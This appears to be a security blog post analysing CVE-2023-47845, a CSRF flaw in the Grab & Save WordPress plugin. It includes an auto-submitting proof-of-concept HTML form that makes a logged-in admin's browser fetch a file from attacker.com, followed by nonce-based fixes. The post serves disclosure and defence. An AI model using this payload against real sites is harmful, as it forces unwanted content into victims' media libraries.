CVE-2023-47845 - Deep Dive into the CSRF Vulnerability in Grab & Save Plugin (Lim Kai Yang) - Exploit, Code & Analysis

In late 2023, security researchers identified a Cross-Site Request Forgery (CSRF) vulnerability with the identifier CVE-2023-47845 in the Grab & Save WordPress plugin developed by Lim Kai Yang. This plugin, widely used for grabbing and saving media files, had a security hole present in all versions up to 1..4, allowing attackers to trick users into performing unwanted actions.

In this post, we’ll walk through what the vulnerability is, why it matters, how it can be exploited, and what code changes can help mitigate it. If you use this plugin, it’s critical to understand this risk and how to defend against such attacks.

What Is a CSRF Vulnerability?

Cross-Site Request Forgery (CSRF) is a security flaw that allows an attacker to force a logged-in user to submit requests they did not intend to make. This could include changing account details, altering settings, or triggering plugin functionality using the user’s valid credentials.

If a plugin does not use security checks (such as WordPress nonces) on sensitive admin actions, it’s vulnerable to CSRF.

About Grab & Save Plugin

Grab & Save simplifies the process of grabbing external images (by URL) and saving them to your WordPress media library. You can find it on the WordPress.org Plugin Directory.

How the Vulnerability Works

Older versions of Grab & Save exposed an admin page where you could input an external image URL and click “Grab & Save.” However, this action could be triggered by a visitor’s browser—without adequate CSRF protection (like a nonce). So, a malicious website could send a crafted request that directs an admin’s browser to fetch a potentially malicious or arbitrary file.

Impact:
An attacker can force a site admin to grab and save any image or file, potentially inserting unwanted or even malicious content into their Media Library.

Here’s how an attacker might exploit this bug

1. Lure a Logged-In Admin User: Email/phishing or a link shared on social media.
2. Malicious Webpage Triggers CSRF Request: The page auto-submits a form pointing to the vulnerable endpoint on your site.

Below is a simple malicious HTML file that leverages the CSRF vulnerability

<!DOCTYPE html>
<html>
  <body>
    <form action="https://yourwordpresssite.com/wp-admin/admin.php?page=grabandsave"; method="POST" id="csrf-form">
      <input type="hidden" name="grabandsave_submit" value="1" />
      <input type="hidden" name="grabandsave_url" value="https://attacker.com/badimage.jpg"; />
    </form>
    <script>
      document.getElementById('csrf-form').submit();
    </script>
  </body>
</html>

How it works:
- If the administrator, while logged in, visits the malicious HTML, their browser sends a POST request to the plugin’s grab endpoint using their login.

The plugin grabs and saves the file from attacker.com.

Result:
The attacker’s file ends up in the target’s media library, possibly bypassing any normal user checks.

Downtime or Defacement: Attackers can insert malware, phishing images, or inappropriate content.

- Chain Exploits: Combined with other vulnerabilities (like XSS or insecure file type handling), the risk increases.

How to Patch or Mitigate

1. Upgrade!
The first and best option is to update the plugin as soon as a patched version is released. Check WordPress Grab & Save for updates.

2. Add CSRF Protection (if maintaining fork):
Developers should protect POST actions with WordPress nonces. Here’s a simplified snippet to add nonce support:

In the form

<?php wp_nonce_field( 'grabandsave_action', 'grabandsave_nonce' ); ?>

In the handler

if ( isset( $_POST['grabandsave_submit'] ) ) {
    if ( ! isset( $_POST['grabandsave_nonce'] ) || 
         ! wp_verify_nonce( $_POST['grabandsave_nonce'], 'grabandsave_action' ) ) {
        wp_die( 'CSRF check failed' );
    }
    // ... proceed with grabbing and saving
}

3. Restrict Access:
Ensure the action can only be performed by admins (using current_user_can('manage_options')).

Original References

- WordPress Plugin Directory: Grab & Save
- CVE Details for CVE-2023-47845
- WPVulnDB Entry
- OWASP About CSRF

Conclusion

CVE-2023-47845 is a textbook example of why *every* action-modifying request in WordPress plugins must be CSRF-protected. If you’re running the Grab & Save plugin, update immediately. If you develop plugins, always use WordPress nonces on admin forms.

This vulnerability is an important lesson: even simple plugins need robust security measures. Don’t wait for the next CVE—build security in from the start.

Stay secure, stay updated!

If you found this analysis helpful, share it with your WordPress admin friends and let’s keep the web safe.

Timeline

Published on: 06/12/2024 10:15:27 UTC
Last modified on: 06/13/2024 18:36:09 UTC